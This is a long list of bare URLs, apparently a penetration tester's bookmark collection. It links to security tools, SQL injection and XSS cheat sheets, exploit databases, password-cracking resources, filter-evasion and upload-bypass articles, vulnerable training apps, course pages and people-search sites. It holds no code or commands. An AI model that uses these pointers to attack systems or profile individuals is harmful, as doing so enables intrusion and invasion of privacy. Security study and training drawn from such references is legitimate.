http://code.google.com/p/it-sec-catalog/wiki/Exploitation
http://code.google.com/p/javasnoop/
http://code.google.com/p/keimpx/
http://code.google.com/p/msf-hack/wiki/WmapNikto
http://code.google.com/p/owaspbwa/wiki/ProjectSummary
http://code.google.com/p/pinata-csrf-tool/
http://code.google.com/p/pyrit/
http://code.google.com/p/skipfish/
http://code.google.com/p/wavsep/downloads/list
http://contest.korelogic.com/wordlists.html
http://cr.yp.to/2004-494.html
http://crackme.cenzic.com/Kelev/view/home.php
http://crypto.stanford.edu/cs142/
http://crypto.stanford.edu/cs155/
http://cseweb.ucsd.edu/classes/wi09/cse227/
http://ctf.hcesperer.org/
http://cve.mitre.org/
http://cvedetails.com/
http://demo.testfire.net/
http://dev.tangocms.org/issues/237
http://deviating.net/
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download
http://en.wikipedia.org/wiki/IPv4_subnetting_reference
http://entitycube.research.microsoft.com/
http://esploit.blogspot.com/
http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/
http://exploit.co.il/
http://feoh.tistory.com/22
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://flack.hkpco.kr/
http://forum.intern0t.net/
http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html
http://gnacktrack.co.uk/download.php
http://gse-compliance.blogspot.com/2008/07/netcat.html
http://gynvael.coldwind.pl/
http://h.ackack.net/cheat-sheets/netcat
http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964
http://ha.ckers.org/sqlinjection/
http://hackerfantastic.com/
http://hackme.ntobjectives.com/
http://hakin9.org/
http://hashcrack.blogspot.com/
http://heideri.ch/jso/#javascript
http://heorot.net/livecds/
http://i-web.i.u-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/
http://i8jesus.com/
http://ictf.cs.ucsb.edu/
http://infond.blogspot.com/2010/05/toturial-footprinting.html
http://informatica.uv.es/~carlos/docencia/netinvm/
http://intrepidusgroup.com/insight/mallory/
http://intruded.net/
http://isc.sans.edu/diary.html?storyid=1229
http://isc.sans.edu/diary.html?storyid=2376
http://isc.sans.edu/diary.html?storyid=9397
http://jeremiahgrossman.blogspot.com/
http://junker.org/~tkh16/ncat-for-netcat-users.php
http://lab.mediaservice.net/notes_more.php?id=MSSQL
http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
http://laramies.blogspot.com/
http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf
http://lcamtuf.coredump.cx/strikeout/
http://marc.info/?l=john-users&m=121444075820309&w=2
http://mariano-graziano.llab.it/docs/report.pdf
http://mcafeeseminar.com/focus/downloads/Live_Hacking.pdf
http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf
http://memset.wordpress.com/
http://meterpreter.illegalguy.hostzi.com/
http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads
http://milo2012.wordpress.com/2009/09/27/xlsinjector/
http://msdn.microsoft.com/en-us/library/aa478971.aspx
http://msmvps.com/blogs/alunj/archive/2010/07/07/1773441.aspx
http://myne-us.blogspot.com/
http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html
http://mywiki.wooledge.org/BashPitfalls
http://news.electricalchemy.net/2009/10/cracking-passwords-in-cloud.html
http://nmap.org/
http://nmap.org/ncrack/
http://nmap.org/nsedoc/
http://nvd.nist.gov/
http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
http://ophcrack.sourceforge.net/
http://osvdb.org/
http://packetstormsecurity.org/Crackers/wordlists/
http://packetstormsecurity.org/UNIX/scanners/lfi-rfi2.txt
http://packetstormsecurity.org/UNIX/scanners/rfiscan2.py.txt
http://packetstormsecurity.org/files/view/69896/unicode-fun.txt
http://packetstormsecurity.org/files/view/95399/dotdotpwn-v2.1.tar.gz
http://packetstormsecurity.org/papers/wireless/cracking-air.pdf
http://pastie.org/840199
http://pauldotcom.com/2010/02/running-a-command-on-every-mac.html
http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html
http://pentest.cryptocity.net/
http://pentestmonkey.net/blog/
http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/
http://picfog.com/
http://pipl.com/
http://preachsecurity.blogspot.com/
http://punter-infosec.com/
http://pynstrom.net/holynix.php
http://r00tsec.blogspot.com/2011/03/pr10-08-various-xss-and-information.html
http://readlist.com/lists/insecure.org/nmap-dev/1/7779.html
http://ref.x86asm.net/index.html
http://resources.infosecinstitute.com/
http://reusablesec.blogspot.com/
http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html
http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst
http://rubular.com/
http://samsclass.info/124/124_Sum09.shtml
http://samurai.inguardians.com/
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf
http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp
http://secdocs.lonerunners.net/
http://seclists.org/fulldisclosure/2006/Jun/508
http://seclists.org/metasploit/
http://seclists.org/nmap-dev/2009/q1/581
http://seclists.org/pen-test/2002/Nov/43
http://secunia.com/
http://securestate.blogspot.com/2010/08/xfs-101-cross-frame-scripting-explained.html?utm_source=twitterfeed&utm_medium=twitter
http://security.ucla.edu/pages/Security_Talks
http://securityandrisk.blogspot.com/
http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections
http://securityoverride.com/forum/index.php
http://securityreliks.wordpress.com/
http://securitytube.net/Deploying-Metasploit-as-a-Payload-on-a-Rooted-Box-video.aspx
http://securitytube.net/Nmap-Scripting-Engine-Primer-video.aspx
http://shelldorado.com/shelltips/beginner.html
http://showmedo.com/videotutorials/python
http://shsc.info/FileUploadSecurity
http://sickness.tor.hu/
http://sinbadsecurity.blogspot.com/2008/10/ms-sql-server-password-recovery.html
http://sirdarckcat.blogspot.com/
http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html
http://skipease.com/
http://sla.ckers.org/forum/index.php
http://sla.ckers.org/forum/list.php?2
http://sla.ckers.org/forum/read.php?24,33903
http://smashthestack.org/
http://socialmention.com/
http://sourceforge.net/projects/ajaxshell/
http://sourceforge.net/projects/belch/files/
http://sourceforge.net/projects/hashkill/
http://sourceforge.net/projects/lampsecurity/files/
http://sourceforge.net/projects/rips-scanner/
http://sourceforge.net/projects/thebutterflytmp/
http://sourceforge.net/projects/virtualhacking/files/
http://sourceforge.net/projects/websecuritydojo/
http://sourceforge.net/projects/ws-attacker/files/
http://sourceforge.net/projects/yokoso/
http://sqid.rubyforge.org/#next
http://sqlmap.sourceforge.net/
http://sqlzoo.net/hack/
http://ss64.com/nt/
http://stuff.mit.edu/iap/2009/#websecurity
http://sumolinux.suntzudata.com/
http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html
http://taosecurity.blogspot.com/
http://technotales.wordpress.com/2009/06/14/netcat-tricks/
http://tenable.com/products/nessus
http://testasp.vulnweb.com/
http://testaspnet.vulnweb.com/
http://testphp.vulnweb.com/
http://theultimates.com/
http://threatpost.com/en_us/blogs/hd-moore-metasploit-exploitation-and-art-pen-testing-040210
http://tools.securitytube.net/index.php?title=Main_Page
http://toorcon.org/pres12/3.pdf
http://trac.happypacket.net/
http://translate.google.com/translate?hl=en&sl=es&u=http://xss.codeplex.com/releases/view/43170&prev=/search%3Fq%3Dhttp://www.hackingeek.com/2010/08/x5s-encuentra-fallos-xss-lfi-rfi-en-tus.html%26hl%3Den&rurl=translate.google.com&twu=1
http://twapperkeeper.com/index.php
http://tweepsearch.com/
http://tweepz.com/
http://uptime.netcraft.com/
http://video.google.com/videoplay?docid=4379894308228900017&q=owasp#
http://video.google.com/videoplay?docid=4994651985041179755&ei=_1k4TKj-PI-cqAPioJnKDA&q=deepsec#
http://vimeo.com/16852783
http://vimeo.com/16925188
http://vimeo.com/3418947
http://vimeo.com/user2720399
http://visi.kenshoto.com/
http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html
http://w3af.sourceforge.net/
http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/ettercap_Nov_6_2005-1.pdf
http://websec.files.wordpress.com/2010/11/sqli2.pdf
http://websec.wordpress.com/
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
http://websecuritytool.codeplex.com/documentation?referringTitle=Home
http://wepma.blogspot.com/
http://whatthefuckismyinformationsecuritystrategy.com/
http://whois.webhosting.info/
http://wirewatcher.wordpress.com/
http://www-inst.eecs.berkeley.edu/~cs161/sp11/
http://www.123people.com/
http://www.12robots.com/index.cfm/2010/9/14/Whats-Possible-with-XSS--Security-Series-81
http://www.abysssec.com/blog/2010/05/past-present-future-of-windows-exploitation/
http://www.acunetix.com/cross-site-scripting/scanner.htm
http://www.alphaonelabs.com/
http://www.antionline.com/archive/index.php/t-230603.html
http://www.attackvector.org/
http://www.awarenetwork.org/home/rattle/source/python/exe2bat.py
http://www.backbox.org/
http://www.backtrack-linux.org/
http://www.backtrack-linux.org/forums/
http://www.badstore.net/
http://www.binary-auditing.com/
http://www.bindshell.net/tools/beef
http://www.blackhat.com/presentations/bh-dc-10/Ames_Colin/BlackHat-DC-2010-colin-david-neurosurgery-with-meterpreter-wp.pdf
http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf
http://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf
http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf
http://www.bonsai-sec.com/en/research/moth.php
http://www.catonmat.net/blog/learning-python-programming-language-through-video-lectures/
http://www.cheat-sheets.org/
http://www.commonexploits.com/
http://www.contextis.co.uk/resources/tools/clickjacking-tool/
http://www.corelan.be/
http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf
http://www.cs.rpi.edu/academics/courses/spring10/csci4971/
http://www.cs.sjtu.edu.cn/~kzhu/cs490/
http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
http://www.cs.ucsb.edu/~vigna/courses/cs279/
http://www.cs.uiuc.edu/class/sp08/cs498sh/slides/dsniff.pdf
http://www.darknet.org.uk/
http://www.darknet.org.uk/2010/09/inspathx-tool-for-finding-path-disclosure-vulnerabilities/
http://www.darkoperator.com/
http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html
http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sam_bowne-hijacking_web_2.0.pdf
http://www.dest-unreach.org/socat/
http://www.digininja.org/
http://www.digininja.org/blog/when_all_you_can_do_is_read.php
http://www.divineinvasion.net/authforce/
http://www.domaintools.com/
http://www.dvwa.co.uk/
http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/
http://www.edge-security.com/metagoofil.php
http://www.edge-security.com/theHarvester.php
http://www.eeye.com/products/retina/community
http://www.elitehackers.info/forums/
http://www.ericheitzman.com/passwd/passwords/
http://www.ethicalhacker.net/
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6131.msg32678/#msg32678
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6158.0/
http://www.ethicalhacker.net/content/view/122/2/
http://www.evilsql.com/main/index.php
http://www.exploit-db.com/
http://www.exploit-db.com/google-dorks/
http://www.exploit-db.com/webapps/
http://www.fastandeasyhacking.com/
http://www.fiddler2.com/fiddler2/
http://www.foofus.net/?page_id=63
http://www.foofus.net/jmk/medusa/medusa.html
http://www.foofus.net/~jmk/medusa/medusa-smbnt.html
http://www.gdssecurity.com/l/b/
http://www.gdssecurity.com/l/b/2010/08/10/constricting-the-web-the-gds-burp-api/
http://www.giac.org/certified_professionals/practicals/gsec/0810.php
http://www.glassdoor.com/index.htm
http://www.gnucitizen.org/blog/
http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+gnucitizen+%28GNUCITIZEN%29&utm_content=Twitter
http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972
http://www.governmentsecurity.org/forum/
http://www.grmn00bs.com/
http://www.hackernews.com/
http://www.hackersforcharity.org/ghdb/
http://www.hackfromacave.com/articles_and_adventures/katana_v2_release.html
http://www.hacking-lab.com/news/newspage/livecd-v4.3-available.html
http://www.hackthissite.org/forums/index.php
http://www.hideaway.net/2007/07/hacking-oracle-application-servers.html
http://www.iac.iastate.edu/iasg/libarchive/0910/The_Magic_of_Ettercap/The_Magic_of_Ettercap.pdf
http://www.iana.org/assignments/port-numbers
http://www.iexploit.org/
http://www.ikkisoft.com/stuff/SMH_XSS.txt
http://www.indepthdefense.com/2009/01/metasploit-visual-basic-payloads-in.html
http://www.indepthdefense.com/2009/02/reverse-pivots-with-metasploit-how-not.html
http://www.infosecwriters.com/hhworld/hh8/csstut.htm
http://www.infosecwriters.com/text_resources/pdf/Netcat_for_the_Masses_DDebeer.pdf
http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf
http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
http://www.irongeek.com/i.php?page=videos/aide-winter-2011
http://www.irongeek.com/i.php?page=videos/metasploit-class
http://www.irongeek.com/i.php?page=videos/network-sniffers-class
http://www.irongeek.com/i.php?page=videos/password-exploitation-class
http://www.jigsaw.com/
http://www.justanotherhacker.com/projects/graudit.html
http://www.kioptrix.com/blog/
http://www.krazl.com/blog/?p=3
http://www.leetupload.com/database/Misc/Papers/Asta%20la%20Vista/18.Ettercap_Spoof.pdf
http://www.linuxfromscratch.org/
http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf
http://www.linuxsurvival.com/
http://www.madirish.net/?article=470
http://www.madirish.net/index.html
http://www.matriux.com/
http://www.mavetju.org/unix/dnstracer-man.php
http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
http://www.mcgrewsecurity.com/
http://www.md5this.com/list.php?
http://www.metasploit.com/modules/auxiliary/scanner/http/vmware_server_dir_trav
http://www.mindcenter.net/uploads/ECCE101.pdf
http://www.more.net/sites/default/files/2010JohnStrandKeynote.pdf
http://www.mozilla.com/en-US/about/
http://www.mozilla.com/en-US/firefox/central/
http://www.mozilla.com/en-US/firefox/community/
http://www.mozilla.com/en-US/firefox/customize/
http://www.mozilla.com/en-US/firefox/help/
http://www.my-ip-neighbors.com/
http://www.nessus.org/plugins/index.php?view=single&id=10404
http://www.nessus.org/plugins/index.php?view=single&id=10673
http://www.nessus.org/plugins/index.php?view=single&id=10862
http://www.nessus.org/plugins/index.php?view=single&id=11413
http://www.nessus.org/plugins/index.php?view=single&id=11790
http://www.nessus.org/plugins/index.php?view=single&id=12052
http://www.nessus.org/plugins/index.php?view=single&id=12204
http://www.nessus.org/plugins/index.php?view=single&id=12205
http://www.nessus.org/plugins/index.php?view=single&id=12209
http://www.nessus.org/plugins/index.php?view=single&id=15456
http://www.nessus.org/plugins/index.php?view=single&id=15962
http://www.nessus.org/plugins/index.php?view=single&id=18021
http://www.nessus.org/plugins/index.php?view=single&id=18027
http://www.nessus.org/plugins/index.php?view=single&id=19402
http://www.nessus.org/plugins/index.php?view=single&id=19408
http://www.nessus.org/plugins/index.php?view=single&id=21564
http://www.nessus.org/plugins/index.php?view=single&id=21689
http://www.nessus.org/plugins/index.php?view=single&id=21696
http://www.nessus.org/plugins/index.php?view=single&id=22182
http://www.nessus.org/plugins/index.php?view=single&id=22194
http://www.nessus.org/plugins/index.php?view=single&id=23643
http://www.nessus.org/plugins/index.php?view=single&id=25168
http://www.nessus.org/plugins/index.php?view=single&id=26918
http://www.nessus.org/plugins/index.php?view=single&id=26919
http://www.nessus.org/plugins/index.php?view=single&id=26921
http://www.nessus.org/plugins/index.php?view=single&id=26925
http://www.nessus.org/plugins/index.php?view=single&id=29314
http://www.nessus.org/plugins/index.php?view=single&id=34476
http://www.nessus.org/plugins/index.php?view=single&id=34477
http://www.nessus.org/plugins/index.php?view=single&id=34821
http://www.nessus.org/plugins/index.php?view=single&id=40887
http://www.nessus.org/plugins/index.php?view=single&id=42106
http://www.net-security.org/insecuremag.php
http://www.ngssoftware.com/papers/hpoas.pdf
http://www.ngssoftware.com/services/software-products/Database-Security/NGSSQuirreLOracle.aspx
http://www.ngssoftware.com/services/software-products/internet-security/orascan.aspx
http://www.nirsoft.net/articles/saved_password_location.html
http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/
http://www.nosec.org/2010/0809/629.html
http://www.notsosecure.com/folder2/
http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
http://www.nubuntu.org/
http://www.nullbyte.org.il/Index.html
http://www.nullthreat.net/
http://www.oact.inaf.it/ws-ssri/Costa.pdf
http://www.offensive-security.com/metasploit-unleashed/
http://www.offensivecomputing.net/
http://www.oldapps.com/
http://www.oldversion.com/
http://www.onapsis.com/research.html#bizploit
http://www.onlinehashcrack.com/
http://www.openvas.org/
http://www.openwall.com/john/
http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements
http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project
http://www.owasp.org/index.php/Owasp_SiteGenerator
http://www.owasp.org/index.php/Testing_for_MS_Access
http://www.owasp.org/index.php/Testing_for_Oracle
http://www.packetstormsecurity.org/
http://www.packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt
http://www.packetstormsecurity.org/tools100.html
http://www.paterva.com/web5/
http://www.pauldotcom.com/
http://www.peekyou.com/
http://www.pentest-standard.org/index.php/Main_Page
http://www.pentesterscripting.com/
http://www.pentestit.com/
http://www.phenoelit-us.org/dpl/dpl.html
http://www.phenoelit-us.org/whatSAP/index.html
http://www.phx2600.org/archive/2008/08/29/metacab/
http://www.piotrbania.com/all/kon-boot/
http://www.radare.org/y/
http://www.radarhack.com/tutorial/ads.pdf
http://www.rapid7.com/vulnerability-scanner.jsp
http://www.ravenphpscripts.com/article2974.html
http://www.reddit.com/r/xss/
http://www.robvanderwoude.com/ntadmincommands.php
http://www.room362.com/
http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583
http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974
http://www.sans.org/reading_room/whitepapers/privacy/document_metadata_the_silent_killer__32974
http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219
http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214
http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283
http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507
http://www.seanobriain.com/docs/PasstheParcel-MITMGuide.pdf
http://www.searchbug.com/default.aspx
http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf
http://www.secmaniac.com/
http://www.sectechno.com/2010/07/12/hacking-lotus-domino/?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+Sectechno+%28SecTechno%29&utm_content=Twitter
http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/
http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/
http://www.securityexperiment.com/se/documents/Overlooked%20SQL%20Injection%2020071021.pdf
http://www.securityexperiment.com/se/documents/SQLInjectionCommentary20071021.pdf
http://www.securityfocus.com/bid
http://www.securityforest.com/wiki/index.php/Main_Page
http://www.securityninja.co.uk/
http://www.securityninja.co.uk/burp-suite-tutorial-repeater-and-comparer-tools
http://www.securitytube.net/
http://www.sensepost.com/blog/
http://www.sensepost.com/blog/4552.html
http://www.sensepost.com/labs/tools/pentest/reduh
http://www.serversniff.net/index.php
http://www.shodanhq.com/
http://www.skullsecurity.org/blog/
http://www.skullsecurity.org/wiki/index.php/Passwords
http://www.slideshare.net/Laramies/tactical-information-gathering
http://www.smashingpasswords.com/
http://www.sno.phy.queensu.ca/~phil/exiftool/
http://www.social-engineer.org/
http://www.softperfect.com/products/networkscanner/
http://www.spoke.com/
http://www.spokeo.com/
http://www.spy-hunter.com/Database_Pen_Testing_ISSA_March_25_V2.pdf
http://www.spylogic.net/
http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%e2%80%93-part-2-blogs-message-boards-and-metadata/
http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/
http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/
http://www.sqlteam.com/article/sql-server-versions
http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/
http://www.swaroopch.com/notes/Python_en:Table_of_Contents
http://www.taddong.com/docs/Browser_Exploitation_for_Fun&Profit_Taddong-RaulSiles_Nov2010_v1.1.pdf
http://www.technicalinfo.net/papers/CSS.html
http://www.techvibes.com/blog/a-hackers-story-let-me-tell-you-just-how-easily-i-can-steal-your-personal-data
http://www.tekniqal.com/
http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
http://www.thenewboston.com/?cat=40&pOpen=tutorial
http://www.tineye.com/
http://www.tssci-security.com/
http://www.ucci.it/docs/ICTSecurity-2004-26.pdf
http://www.ustream.tv/recorded/12777183
http://www.ustream.tv/recorded/13396511
http://www.ustream.tv/recorded/13397426
http://www.ustream.tv/recorded/13398740
http://www.virus.org/default-password
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://www.vupen.com/english/advisories/2009/3634
http://www.webappsec.org/projects/articles/071105.shtml
http://www.webappsec.org/projects/threat/
http://www.webscantest.com/
http://www.websecurify.com/
http://www.woodmann.com/TiGa/idaseries.html
http://www.workrobot.com/sansfire2009/561.html
http://www.xing.com/
http://www.yasni.com/
http://www.youtube.com/user/ChRiStIaAn008
http://www.youtube.com/user/HackingCons
http://www.youtube.com/watch?v=WkHkryIoLD0
http://www.zabasearch.com/
http://www.zonbi.org/?p=253
http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html
http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
http://xs-sniper.com/blog/
http://xsser.sourceforge.net/
http://xsser.sourceforge.net/#intro
http://zastita.com/02114/Attacking_ColdFusion..html
http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
http://zoominfo.com/
https://addons.mozilla.org/en-US/firefox/addon/cve-dictionary-search-plugin/
https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/
https://addons.mozilla.org/en-US/firefox/addon/osvdb/
https://addons.mozilla.org/en-US/firefox/addon/oval-repository-search-plugin/
https://addons.mozilla.org/en-US/firefox/addon/packet-storm-search-plugin/
https://addons.mozilla.org/id/firefox/collections/byrned/pentesting/?page=8
https://github.com/koto/squid-imposter
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot
https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot/
https://pentoo.ch/
https://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc@group.calendar.google.com&gsessionid=OK
https://www.ssllabs.com/ssldb/analyze.html